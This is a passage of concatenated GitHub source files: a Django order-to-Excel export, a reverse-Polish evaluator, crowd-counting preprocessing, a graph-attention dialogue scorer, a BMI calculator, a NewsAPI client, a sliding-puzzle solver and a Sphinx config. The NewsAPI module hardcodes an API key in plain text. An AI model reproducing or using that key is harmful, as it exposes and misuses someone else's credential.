isinstance(fields, tuple):\n        pass\n    else:\n        raise CreateSheetError(expression=fields, message=\"Fields Error\")\n    writer = None\n    try:\n        df = pd.DataFrame(data, columns=fields)\n\n        # delete the duplicate data according to orders.AmazonOrderId and keep the latest record\n        if 'orders.AmazonOrderId' in fields:\n            df = df.drop_duplicates(['orders.AmazonOrderId', 'orderitems.SellerSKU'], keep='last').reset_index(drop=True)\n        # transfer timezone\n        df = df_tz_transfer(df, from_tz, to_tz)\n        # replace the column name with col_repl\n        if col_repl:\n            df.columns = col_repl\n\n        created_time = datetime.datetime.strftime(datetime.datetime.now(),\"%Y%m%d_%H%M%S\")\n        file_path = os.path.join(os.path.dirname(__file__), 'temp_files/', created_time+'.xlsx')\n        writer = pd.ExcelWriter(file_path)\n        df.to_excel(writer, sheet_name='Sheet1', index=False)\n        writer.save()\n        return file_path\n    except Exception:\n        raise CreateSheetError(message=\"Creating Error\")\n    finally:\n        # close the writer only if it was successfully created\n        if writer is not None:\n            writer.close()\n\n\n# transfer timezone of DataFrame columns of Timestamp type to a certain timezone\ndef df_tz_transfer(df, from_tz, to_tz):\n    if df.shape[0]:\n        # Check type of each column. If the time is pandas._libs.tslib.Timestamp, then change its timezone.\n        for column in df.columns:\n            # get the index of the first item in that column that is not NaN (NaN != NaN)\n            for i in df.index:\n                if df[column][i] == df[column][i]:\n                    break\n            if type(df[column][i]) is pd._libs.tslib.Timestamp:\n                tmp = list(df[column])\n                df[column] = [tz_transfer(str(i), from_tz, to_tz) for i in tmp]\n        return df\n    else:\n        return df\n\n\n# open a file in stream (using the generator method)\ndef _file_iterator(file_name, chunk_size=512):\n    with open(file_name, 'rb') as f:\n        while True:\n            c = f.read(chunk_size)\n            if c:\n                yield c\n            else:\n                break\n\n\n# transfer a time string in the 'from_tz' timezone to a time string in the 'to_tz' timezone\ndef tz_transfer(time_string, from_tz, to_tz):\n    # return '' if the time_string is None\n    if time_string in ('', 'NaT'):\n        return ''\n\n    from_tz = timezone(from_tz)\n    to_tz = timezone(to_tz)\n    fmt = '%Y-%m-%d %H:%M:%S'\n\n    from_time = from_tz.localize(datetime.datetime.strptime(time_string, fmt))\n    to_time = from_time.astimezone(to_tz)\n    return to_time.strftime(fmt)\n","repo_name":"suiweifanchen/A-Simple-Django-Project","sub_path":"amazon/sheet_download/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42453578549","text":"class Solution:\n    def evalRPN(self, tokens: List[str]) -> int:\n        stack = []\n        for token in tokens:\n            if token.isnumeric() or token[1:].isnumeric():\n                stack.append(int(token))\n            else:\n                operand1 = stack[-2]\n                operand2 = stack.pop(-1)\n\n                if token == \"/\":\n                    token = \"//\"\n                    actual = eval(f\"{operand1} {token} {operand2}\")\n                    candidate = eval(f\"{abs(operand1)} {token} {abs(operand2)}\")\n                    if abs(actual) != abs(candidate):\n                        stack[-1] = -1 * candidate\n                    else:\n                        stack[-1] = actual\n                else:\n                    stack[-1] = eval(f\"{operand1} {token} {operand2}\")\n        return stack[-1]","repo_name":"versenyi98/programming-contests","sub_path":"LeetCode/0150. 
Evaluate Reverse Polish Notation/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1119288643","text":"import scipy.io as sio\nimport os\nimport numpy as np\nimport PIL.Image as pli\nimport math\nimport multiprocessing as mlt \nimport matplotlib.pyplot as plt \nimport matplotlib.image as mpimg\n \n\nST_DATA = \"Shanghai Tech Dataset\"\nUCF_DATA = \"UCF CC 50 Dataset\"\n\nST_DATA_CONFIG = {\n 'dataset': ST_DATA,\n 'img_format': 'IMG_{}.jpg',\n 'gt_format': 'GT_IMG_{}.mat',\n 'img_ext': 'jpg'\n}\n\nUCF_DATA_CONFIG = {\n 'dataset': UCF_DATA,\n 'img_format': '{}.jpg',\n 'gt_format': '{}_ann.mat',\n 'img_ext': 'jpg'\n}\n\nUCSD_DATA_CONFIG = {\n 'img_format': 'vidf1_33_00{}_f{}.png',\n 'gt_format': 'vidf1_33_00{}_frame_full.mat',\n 'numfiles': 200,\n 'img_ext': 'jpg'\n}\n\nclass DimensionException(Exception):\n pass\n\nclass BaseCreatePatches:\n def __init__(self, **kwargs):\n self.img_fold = self.get_full_path(kwargs.pop('img_fold'))\n self.gt_fold = self.get_full_path(kwargs.pop('gt_fold'))\n self.final_img_fold = self.get_full_path(kwargs.pop('final_img_fold'), True)\n self.final_gt_fold = self.get_full_path(kwargs.pop('final_gt_fold'), True)\n self.img_prefix = 'IMG_'\n self.img_format = kwargs.pop('img_format')\n self.gt_format = kwargs.pop('gt_format')\n self.numfiles = self.get_numfiles(kwargs)\n self.img_ext = kwargs.pop('img_ext')\n\n def get_full_path(self, rel_path, makedir=False):\n directory = os.path.join(\n os.path.dirname(\n os.path.abspath(\n __file__\n )\n ),\n rel_path\n )\n if makedir:\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n return directory \n\n def get_numfiles(self, kwargs):\n if \"numfiles\" in kwargs:\n return kwargs.pop('numfiles')\n else:\n return len([f for f in os.listdir(self.img_fold) if f.endswith('.jpg') and os.path.isfile(os.path.join(self.img_fold, f))]) \n\n def create_dotmaps(self, gt, img_h, img_w):\n d_map = np.zeros((int(img_h), int(img_w)))\n\n gt = gt[gt[:, 0] < img_w, :]\n gt = gt[gt[:, 1] < img_h, :]\n\n for i in range(gt.shape[0]):\n x = int(max(1, math.floor(gt[i, 0]))) - 1\n y = int(max(1, math.floor(gt[i, 1]))) - 1\n d_map[y, x] = 1.0\n return d_map\n\n def check_dim(self, img):\n if img.ndim != 3:\n if img.ndim == 2:\n img = np.stack((img,)*3, axis=2)\n else:\n raise DimensionException(\"Image has incorrect dimensions. 
{}\".format(img.shape))\n return img\n\n def save_gt(self, gt, i, count):\n name = '{}{}_{}.mat'.format(self.img_prefix, i + 1, count)\n sio.savemat(os.path.join(self.final_gt_fold, name), {'final_gt': gt})\n\n def save_image(self, img, i, count):\n name = '{}{}_{}.{}'.format(self.img_prefix, i + 1, count, self.img_ext)\n img = np.uint8(img)\n img = pli.fromarray(img).save(os.path.join(self.final_img_fold, name))\n\n def plot_image_tiles(self, index):\n fig = plt.figure()\n count = 1\n for i in range(3):\n for j in range(3):\n a=fig.add_subplot(3,3,count)\n a.set_xticks([])\n a.set_yticks([])\n b = mpimg.imread(\n os.path.join(self.final_img_fold, 'IMG_{}_{}.{}'.format(index, count, self.img_ext)))\n imgplot = plt.imshow(b)\n count += 1\n plt.subplots_adjust(left=None, bottom=.18, right=None, top=None, wspace=.01, hspace=.001)\n plt.show()\n\n def plot_dot_tiles(self, index):\n fig = plt.figure()\n count = 1\n for i in range(3):\n for j in range(3):\n a=fig.add_subplot(3,3,count)\n a.set_xticks([])\n a.set_yticks([])\n d = sio.loadmat(\n os.path.join(self.final_gt_fold, 'IMG_{}_{}.mat'.format(index, count)))\n dt = d['final_gt']\n imgplot = plt.imshow(dt, cmap='gray')\n count += 1\n plt.subplots_adjust(left=None, bottom=.18, right=None, top=None, wspace=.01, hspace=.001)\n plt.show() \n\n\nclass CreatePatches(BaseCreatePatches):\n\n def __init__(self, **kwargs):\n super(CreatePatches, self).__init__(**kwargs)\n self.dataset = kwargs.pop('dataset')\n\n\n def get_image(self, i):\n img_filename = self.img_format.format(i + 1)\n img_path = os.path.join(self.img_fold, img_filename)\n img = pli.open(img_path)\n img = np.asarray(img, dtype=np.uint8)\n return img\n\n def _get_st_data_ground_truth(self, i):\n gt_filename = self.gt_format.format(i + 1)\n gt_path = os.path.join(self.gt_fold, gt_filename)\n gt = sio.loadmat(gt_path)\n image_info = gt['image_info']\n value = image_info[0,0]\n assert len(value['location']) == 1\n for i in value['location']:\n assert len(i) == 1\n for j in i:\n return j \n\n def _get_ucf_data_ground_truth(self, i):\n gt_filename = self.gt_format.format(i + 1)\n gt_path = os.path.join(self.gt_fold, gt_filename)\n gt = sio.loadmat(gt_path)\n ann_points = gt['annPoints']\n return ann_points\n\n def get_ground_truth(self, i):\n if self.dataset == ST_DATA:\n return self._get_st_data_ground_truth(i) \n\n elif self.dataset == UCF_DATA:\n return self._get_ucf_data_ground_truth(i)\n\n def _create_test_set(self, i):\n #print(i + 1)\n img = self.get_image(i)\n # moved this out of loop because 3rd dim indexing doesn't work in numpy unless already that shape\n img = self.check_dim(img)\n gt = self.get_ground_truth(i)\n print (gt.shape)\n\n d_map_h = math.floor(math.floor(float(img.shape[0]) / 2.0) / 2.0)\n d_map_w = math.floor(math.floor(float(img.shape[1]) / 2.0) / 2.0)\n\n d_map = self.create_dotmaps(gt / 4.0, d_map_h, d_map_w)\n\n p_h = int(math.floor(float(img.shape[0]) / 3.0))\n p_w = int(math.floor(float(img.shape[1]) / 3.0))\n d_map_ph = int(math.floor(math.floor(p_h / 2.0) / 2.0))\n d_map_pw = int(math.floor(math.floor(p_w / 2.0) / 2.0))\n \n py = 0\n py2 = 0\n count = 1\n\n for j in range(3):\n px = 0\n px2 = 0\n for k in range(3):\n final_image = img[py:py + p_h, px: px + p_w, :]\n final_gt = d_map[py2: py2 + d_map_ph, px2: px2 + d_map_pw] \n px = px + p_w \n px2 = px2 + d_map_pw\n self.save_image(final_image, i, count)\n self.save_gt(final_gt, i, count)\n count += 1\n py = py + p_h\n py2 = py2 + d_map_ph \n\n def create_test_set(self):\n p = mlt.Pool(mlt.cpu_count())\n 
p.map(self._create_test_set, range(self.numfiles))\n\n #for i in range(self.numfiles):\n #self._create_test_set(i)\n\n\nclass CreatePatchesUCSD(BaseCreatePatches):\n def __init__(self, **kwargs):\n super(CreatePatchesUCSD, self).__init__(**kwargs)\n\n\n def get_image(self, i, j):\n img_filename = self.img_format.format(i, f'{(j + 1):03}')\n #print (img_filename)\n img_path = os.path.join(self.sub_img_fold, img_filename)\n img = pli.open(img_path)\n img = np.asarray(img, dtype=np.uint8)\n return img\n\n def get_ground_truth(self, j):\n gt = self.gts[j]\n for x in gt['loc']:\n for y in x:\n return np.delete(y, 2, 1)\n\n def _create_test_set(self, i, j):\n print (self.overall_count)\n #print(j + 1)\n img = self.get_image(i, j) # ten image folders, each with 200 images\n # moved this out of loop because 3rd dim indexing doesn't work in numpy unless already that shape\n img = self.check_dim(img)\n gt = self.get_ground_truth(j) # ten frame .mat files, each with 200 locations\n #print (gt.shape)\n\n d_map_h = math.floor(math.floor(float(img.shape[0]) / 2.0) / 2.0)\n d_map_w = math.floor(math.floor(float(img.shape[1]) / 2.0) / 2.0)\n\n d_map = self.create_dotmaps(gt / 4.0, d_map_h, d_map_w)\n #print(np.count_nonzero(d_map))\n\n p_h = int(math.floor(float(img.shape[0]) / 3.0))\n p_w = int(math.floor(float(img.shape[1]) / 3.0))\n d_map_ph = int(math.floor(math.floor(p_h / 2.0) / 2.0))\n d_map_pw = int(math.floor(math.floor(p_w / 2.0) / 2.0))\n \n py = 0\n py2 = 0\n count = 1\n\n for _ in range(3):\n px = 0\n px2 = 0\n for __ in range(3):\n final_image = img[py:py + p_h, px: px + p_w, :]\n final_gt = d_map[py2: py2 + d_map_ph, px2: px2 + d_map_pw] \n px = px + p_w \n px2 = px2 + d_map_pw\n self.save_image(final_image, self.overall_count, count)\n self.save_gt(final_gt, self.overall_count, count)\n count += 1\n py = py + p_h\n py2 = py2 + d_map_ph \n\n self.overall_count += 1\n\n def get_gts(self, i):\n gt = sio.loadmat(os.path.join(self.gt_fold, self.gt_format.format(i)))\n return gt['frame'][0]\n\n def create_test_set(self):\n #p = mlt.Pool(mlt.cpu_count())\n #p.map(self._create_test_set, range(self.numfiles))\n self.overall_count = 0\n for i in range(10):\n self.sub_img_fold = os.path.join(self.img_fold, 'vidf1_33_00{}.y/'.format(i))\n self.gts = self.get_gts(i)\n\n for j in range(self.numfiles):\n self._create_test_set(i, j)\n\nif __name__ == '__main__':\n\n inputs = {\n 'img_fold': 'ST_DATA/A/test/images/',\n 'gt_fold': 'ST_DATA/A/test/ground_truth/',\n 'final_img_fold': 'st_data_A_test/images/',\n 'final_gt_fold': 'st_data_A_test/gt/'\n\n }\n inputs.update(**ST_DATA_CONFIG)\n test = CreatePatches(**inputs)\n test.create_test_set()\n test.plot_image_tiles(2)\n test.plot_dot_tiles(2)\n\n inputs = {\n 'img_fold': 'ST_DATA/A/train/images/',\n 'gt_fold': 'ST_DATA/A/train/ground_truth/',\n 'final_img_fold': 'st_data_A_train/images/',\n 'final_gt_fold': 'st_data_A_train/gt/'\n\n }\n inputs.update(**ST_DATA_CONFIG)\n test = CreatePatches(**inputs)\n test.create_test_set()\n test.plot_image_tiles(2)\n test.plot_dot_tiles(2)\n\n \n inputs = {\n 'img_fold': 'ST_DATA/B/test_data/images/',\n 'gt_fold': 'ST_DATA/B/test_data/ground_truth/',\n 'final_img_fold': 'st_data_B_test/images/',\n 'final_gt_fold': 'st_data_B_test/gt/'\n\n }\n inputs.update(**ST_DATA_CONFIG)\n test = CreatePatches(**inputs)\n test.create_test_set()\n test.plot_image_tiles(2)\n test.plot_dot_tiles(2)\n\n inputs = {\n 'img_fold': 'ST_DATA/B/train_data/images/',\n 'gt_fold': 'ST_DATA/B/train_data/ground_truth/',\n 'final_img_fold': 
'st_data_B_train/images/',\n 'final_gt_fold': 'st_data_B_train/gt/'\n\n }\n inputs.update(**ST_DATA_CONFIG)\n test = CreatePatches(**inputs)\n test.create_test_set()\n test.plot_image_tiles(2)\n test.plot_dot_tiles(2) \n\n \n inputs = {\n 'img_fold': 'UCF_CC_50/',\n 'gt_fold': 'UCF_CC_50/',\n 'final_img_fold': 'ucf_data/images/',\n 'final_gt_fold': 'ucf_data/gt/',\n\n }\n inputs.update(**UCF_DATA_CONFIG)\n\n test = CreatePatches(**inputs)\n test.create_test_set()\n test.plot_image_tiles(1)\n test.plot_dot_tiles(1)\n\n \n \n inputs = {\n 'img_fold': 'ucsdpeds/vidf/',\n 'gt_fold': 'gt_1_33/',\n 'final_img_fold': 'ucsd_data/images/',\n 'final_gt_fold': 'ucsd_data/gt/'\n }\n inputs.update(**UCSD_DATA_CONFIG)\n test = CreatePatchesUCSD(**inputs)\n test.create_test_set()\n test.plot_image_tiles(40)\n test.plot_dot_tiles(40)\n \n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Elinor78/crowd-counting","sub_path":"src/create_patches.py","file_name":"create_patches.py","file_ext":"py","file_size_in_byte":11989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18556000386","text":"from typing import List, Optional\n\nfrom pydantic import BaseModel\n\n\nclass Individual_details(BaseModel):\n lastname: str\n firstname: str\n title: str\n gender: str\n occupation: Optional[str]\n birth_date: str\n address: str\n\n\nclass Insolvency_case_details(BaseModel):\n fullname: str\n court: str\n type: str\n number: str\n arrangement_date: str\n status: str\n notification_date: Optional[str] = None\n\n\nclass Practitioner_contact(BaseModel):\n fullname: List[str]\n org_name: str\n address: str\n post_code: str\n phone: str\n\n\nclass Service_contact(BaseModel):\n insolvency_service_office: List[str]\n contact: str\n address: str\n post_code: str\n phone: str\n\n\nclass Data(BaseModel):\n platform_id = 'the_insolvency_service'\n personal_info: List[Individual_details]\n case_info: List[Insolvency_case_details]\n practitioner_contact: List[Practitioner_contact]\n service_contact: List[Service_contact]\n","repo_name":"theworldcitizen/kd-crawler2","sub_path":"src/models/by_name.py","file_name":"by_name.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18199817636","text":"import torch\nfrom torch._C import device\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom transformers import BertModel\n\n\nclass GRADE(nn.Module):\n \"\"\"model code\"\"\"\n\n def __init__(self, embedding_init_value, tokenizer_len):\n super().__init__()\n self.bert_encoder = BertModel.from_pretrained(\"bert-base-uncased\")\n self.bert_encoder.resize_token_embeddings(tokenizer_len)\n self.linear_onehop_weight = torch.nn.Linear(300 * (8 + 2), 300)\n self.linear_twohop_weight = torch.nn.Linear(300 * (8 + 2), 300)\n\n self.linear0_1 = torch.nn.Linear(300 * (8 + 2), 300)\n self.linear0_2 = torch.nn.Linear(300 * (8 + 2), 300)\n self.linear0_3 = torch.nn.Linear(300 * (8 + 2), 300)\n\n self.linear1 = torch.nn.Linear(300, 512)\n self.linear2_1 = torch.nn.Linear(768, 512)\n self.linear2_2 = torch.nn.Linear(768, 512)\n self.linear3 = torch.nn.Linear(1024, 512)\n self.linear4_1 = torch.nn.Linear(512, 128)\n self.linear4_2 = torch.nn.Linear(512, 128)\n self.linear5 = torch.nn.Linear(128, 1)\n\n self.word_embedder = nn.Embedding(num_embeddings=50000, embedding_dim=300, padding_idx=0)\n self.word_embedder.weight = 
nn.Parameter(torch.tensor(embedding_init_value))\n self.gat_1 = GATLayer(\n in_features=300,\n out_features=300,\n alpha=0.2,\n nheads=4,\n activation=False,\n )\n self.gat_2 = GATLayer(\n in_features=300,\n out_features=300,\n alpha=0.2,\n nheads=4,\n activation=False,\n )\n self.gat_3 = GATLayer(\n in_features=300,\n out_features=300,\n alpha=0.2,\n nheads=4,\n activation=False,\n )\n\n def forward(self, input_ids, input_masks, keyword_ids, adjs):\n keyword_h_embed = self.word_embedder(keyword_ids).float()\n keyword_nonzero = torch.count_nonzero(keyword_ids, dim=1)\n bs = input_ids.size(0)\n\n # gat_1\n keyword_z_embed = self.gat_1(keyword_h_embed, adjs)\n keyword_h_embed = F.elu(\n self.linear0_1(keyword_h_embed.reshape(bs, -1)).reshape(bs, -1, 300) + keyword_z_embed\n )\n # gat_2\n keyword_z_embed = self.gat_2(keyword_h_embed, adjs)\n keyword_h_embed = F.elu(\n self.linear0_2(keyword_h_embed.reshape(bs, -1)).reshape(bs, -1, 300) + keyword_z_embed\n )\n # gat_3\n keyword_z_embed = self.gat_3(keyword_h_embed, adjs)\n keyword_h_embed = F.elu(\n self.linear0_3(keyword_h_embed.reshape(bs, -1)).reshape(bs, -1, 300) + keyword_z_embed\n )\n # mean pool\n keyword_h_embed = F.elu(\n self.linear1(torch.div(torch.sum(keyword_h_embed, dim=1), keyword_nonzero.unsqueeze(1)))\n )\n\n bert_embed = self.bert_encoder(input_ids, input_masks, return_dict=True)[\n \"last_hidden_state\"\n ][:, 0]\n\n bert_embed = self.linear2_1(bert_embed)\n\n fusion_embs = torch.cat((bert_embed, keyword_h_embed), 1)\n fusion_embs = F.elu(self.linear3(fusion_embs))\n\n linear = F.elu(self.linear4_1(fusion_embs))\n linear = self.linear5(linear)\n score = torch.sigmoid(linear).squeeze()\n return score\n\n\nclass GATHead(nn.Module):\n def __init__(self, in_features, out_features, alpha, activation=True, device=\"cpu\"):\n super(GATHead, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.activation = activation\n\n self.W = nn.Linear(in_features, out_features, bias=False)\n self.a = nn.Linear(2 * out_features, 1, bias=False)\n\n self.leakyrelu = nn.LeakyReLU(alpha)\n\n def forward(self, input, adj):\n adj = adj.type(torch.FloatTensor)\n h = self.W(input)\n (B, N, _) = adj.shape\n a_input = torch.cat([h.repeat(1, 1, N).view(B, N * N, -1), h.repeat(1, N, 1)], dim=1).view(\n B, N, -1, 2 * self.out_features\n )\n e = self.leakyrelu(self.a(a_input).squeeze(3))\n\n zero_vec = -9e15 * torch.ones_like(e)\n\n attention = torch.where(adj > 0, e, zero_vec)\n attention = attention * adj\n attention = F.softmax(attention, dim=1)\n h_prime = torch.matmul(attention, h)\n\n if self.activation:\n return F.elu(h_prime)\n else:\n return h_prime\n\n def __repr__(self):\n return (\n self.__class__.__name__\n + \" (\"\n + str(self.in_features)\n + \" -> \"\n + str(self.out_features)\n + \")\"\n )\n\n\nclass GATLayer(nn.Module):\n \"\"\"\n Graph Attention Layer, GAT paper at https://arxiv.org/abs/1710.10903\n Implementation inspired by https://github.com/Diego999/pyGAT\n \"\"\"\n\n def __init__(self, in_features, out_features, alpha, nheads=1, activation=True, device=\"cpu\"):\n \"\"\"\n :param in_features: size of the input per node\n :param out_features: size of the output per node\n :param alpha: slope of the leaky relu\n :param nheads: number of attention heads\n :param activation: whether to apply a non-linearity\n :param device: device used for computation\n \"\"\"\n super(GATLayer, self).__init__()\n assert out_features % nheads == 0\n\n self.input_head = in_features\n self.output_head = out_features // 
nheads\n\n self.heads = nn.ModuleList()\n for _ in range(nheads):\n self.heads.append(\n GATHead(\n in_features=self.input_head,\n out_features=self.output_head,\n alpha=alpha,\n activation=activation,\n )\n )\n\n def forward(self, input, adj):\n y = torch.cat([head(input, adj) for head in self.heads], dim=2)\n return y\n\n def __repr__(self):\n return (\n self.__class__.__name__\n + \" (\"\n + str(self.in_features)\n + \" -> \"\n + str(self.out_features)\n + \")\"\n )\n","repo_name":"nlpcl-lab/dialog_evaluation_w_hard_negative","sub_path":"graph_model.py","file_name":"graph_model.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74876916626","text":"'''\nThis file contains the BMICalculator class which performs the BMI calculations.\n'''\nclass BMICalculator:\n def calculate_bmi(self, height, weight):\n '''\n Calculates the BMI using the given height and weight.\n '''\n if height == 0:\n raise ValueError(\"Height cannot be zero.\")\n bmi = weight / ((height / 100) ** 2)\n return round(bmi, 2)\n def get_bmi_level(self, bmi):\n '''\n Returns the BMI level based on the calculated BMI.\n '''\n if bmi < 18.5:\n return \"Underweight\"\n elif bmi < 25:\n return \"Normal weight\"\n elif bmi < 30:\n return \"Overweight\"\n else:\n return \"Obese\"\n def get_weight_status(self, bmi):\n '''\n Returns the weight status based on the calculated BMI.\n '''\n if bmi < 18.5:\n return \"You are underweight.\"\n elif bmi < 25:\n return \"You have a normal weight.\"\n elif bmi < 30:\n return \"You are overweight.\"\n else:\n return \"You are obese.\"\n def get_normal_bmi(self):\n '''\n Returns the normal BMI range.\n '''\n return \"18.5 - 24.9\"\n def get_normal_weight(self, height):\n '''\n Returns the normal weight range based on the given height.\n '''\n normal_weight_min = 18.5 * ((height / 100) ** 2)\n normal_weight_max = 24.9 * ((height / 100) ** 2)\n return f\"{round(normal_weight_min, 2)} - {round(normal_weight_max, 2)}\"","repo_name":"toanctran/DevAgent","sub_path":"WareHouse/BMI Calculator 2_TT DevAgent_20231027121757/bmi_calculator.py","file_name":"bmi_calculator.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11254598090","text":"from newsapi import NewsApiClient \r\nnews = NewsApiClient(api_key='6bb8e26abfc14f30bdf9a25ff6a893bf')\r\n\r\n# Top News\r\ndef top_headlines(country=None):\r\n\ttry:\r\n\t\ttop_news = news.get_top_headlines(country=country,language='en',page_size=10)\r\n\t\ttop_headlines=[]\r\n\t\tfor i in range(len(top_news['articles'])):\r\n\t\t\t#111\r\n\t\t\ttitle = top_news['articles'][i]['title']\r\n\t\t\tif(len(title)>105):\r\n\t\t\t\ttop_headlines.append(title[:105]+'. . 
.')\r\n\t\t\telse:\r\n\t\t\t\ttop_headlines.append(title)\r\n\t\treturn top_headlines\r\n\texcept:\r\n\t\treturn ['No Internet Connection']*100\r\n\r\ndef top_headlines_link(country=None):\r\n\ttry:\r\n\t\ttop_news = news.get_top_headlines(country=country,language='en',page_size=10)\r\n\t\ttop_headlines_link=[]\r\n\t\tfor i in range(len(top_news['articles'])):\r\n\t\t\ttop_headlines_link.append(top_news['articles'][i]['url'])\r\n\t\treturn top_headlines_link\r\n\texcept:\r\n\t\treturn ['']*100\r\n\r\n# News By Query\r\ndef get_news(query):\r\n\ttry:\r\n\t\tquery_news = news.get_everything(q=query,language='en',page_size=20)\r\n\t\tquery_headlines=[]\r\n\t\tfor i in range(len(query_news['articles'])):\r\n\t\t\t#111\r\n\t\t\ttitle = query_news['articles'][i]['title']\r\n\t\t\tif(len(title)>105):\r\n\t\t\t\tquery_headlines.append(title[:105]+'. . .')\r\n\t\t\telse:\r\n\t\t\t\tquery_headlines.append(title)\r\n\t\tif(len(query_headlines)<20):\r\n\t\t\tquery_headlines = query_headlines + ['No Result Found, Click to see google search!']*(20-len(query_headlines))\r\n\t\treturn query_headlines\r\n\texcept:\r\n\t\treturn ['No Internet Connection']*100\r\n\r\ndef query_headlines_link(query):\r\n\ttry:\r\n\t\tquery_news = news.get_everything(q=query,language='en',page_size=20)\r\n\t\tquery_headlines_link=[]\r\n\t\tfor i in range(len(query_news['articles'])):\r\n\t\t\tquery_headlines_link.append(query_news['articles'][i]['url'])\r\n\t\tif(len(query_headlines_link)<20):\r\n\t\t\tquery_headlines_link = query_headlines_link + ['https://www.google.co.in/search?q='+query]*(20-len(query_headlines_link))\r\n\t\treturn query_headlines_link\r\n\texcept:\r\n\t\treturn ['']*100\r\n\r\n# News By Category\r\n\r\ndef cat_headlines(category='general'):\r\n\ttry:\r\n\t\tcat_news = news.get_top_headlines(category=category,country='us',page_size=20)\r\n\t\tcat_headlines=[]\r\n\t\tfor i in range(len(cat_news['articles'])):\r\n\t\t\ttitle = cat_news['articles'][i]['title']\r\n\t\t\tif(len(title)>105):\r\n\t\t\t\tcat_headlines.append(title[:105]+'. . 
.')\r\n\t\t\telse:\r\n\t\t\t\tcat_headlines.append(title)\r\n\t\treturn cat_headlines\r\n\texcept:\r\n\t\treturn ['No Internet Connection']*100\r\n\r\ndef cat_headlines_link(category='general'):\r\n\ttry:\r\n\t\tcat_news = news.get_top_headlines(category=category,country='us',page_size=20)\r\n\t\tcat_headlines_link=[]\r\n\t\tfor i in range(len(cat_news['articles'])):\r\n\t\t\tcat_headlines_link.append(cat_news['articles'][i]['url'])\r\n\t\treturn cat_headlines_link\r\n\texcept:\r\n\t\treturn ['']*100\r\n\r\n\r\n","repo_name":"skgtrx/Adjutor","sub_path":"module/news/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43120550453","text":"from collections import deque\nimport copy\n\n\nclass Solution(object):\n def slidingPuzzle(self, board):\n \"\"\"\n :type board: List[List[int]]\n :rtype: int\n \"\"\"\n\n sol = [[1, 2, 3], [4, 5, 0]]\n if board == sol:\n return 0\n\n # board, count, row, col\n queue = deque()\n for r in range(2):\n for c in range(3):\n if board[r][c] == 0:\n queue.append((board, 0, r, c))\n visited = {}\n visited[self.transform(board)] = 0\n\n while queue:\n board, count, r, c = queue.popleft()\n newCount = count + 1\n for row, col in [(r+1, c), (r-1, c), (r, c+1), (r, c-1)]:\n if row < 0 or row >= 2 or col < 0 or col >= 3:\n continue\n newBoard = copy.deepcopy(board)\n newBoard[r][c], newBoard[row][col] = newBoard[row][col], newBoard[r][c]\n if newBoard == sol:\n return newCount\n key = self.transform(newBoard)\n if key not in visited or newCount < visited[key]:\n visited[key] = newCount\n queue.append((newBoard, newCount, row, col))\n return -1\n\n def transform(self, board):\n ret = board[0] + board[1]\n return tuple(ret)\n","repo_name":"cathuan/LeetCode-Questions","sub_path":"python/q773.py","file_name":"q773.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70228151506","text":"# -*- coding: utf-8 -*-\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = [\n \"sphinxcontrib_robotframework\",\n]\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\nsource_encoding = 'utf-8'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'robotframework-selenium2screenshots'\ncopyright = u'Asko Soukka '\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nversion = '0.4'\n# The full version, including alpha/beta/rc tags.\nrelease = '0.4.0'\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = []\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# -- Options for HTML output --------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. 
See the documentation for\n# a list of builtin themes.\n# html_theme = 'pyramid'\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'robotframework-selenium2screenshots'\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n    'papersize': 'a4paper',\n}\n\nlatex_documents = [\n    # (source target file, target latex name, document title,\n    # author, document class [howto/manual]),\n    ('index', 'robotframework-selenium2screenshots.tex',\n     u'Robot Framework Selenium2Screenshots Library Documentation',\n     u'asko.soukka@iki.fi', 'manual'),\n]\n","repo_name":"collective/robotframework-selenium2screenshots","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"969025241","text":"import pkg_resources\n\n# Load plugins using pkg_resources\n\nplugins = {\n    entry_point.name: entry_point.load()\n    for entry_point in pkg_resources.iter_entry_points('yamljsonmodel.plugins')\n}\n\ndef process_yaml_document(yamldoc):\n\n    for obj in yamldoc:\n\n        kind = obj['kind']\n\n        if kind not in plugins:  # dict.has_key was removed in Python 3\n            raise Exception('No plugin named %s' % kind)\n\n        plugin = plugins[kind]\n\n        return 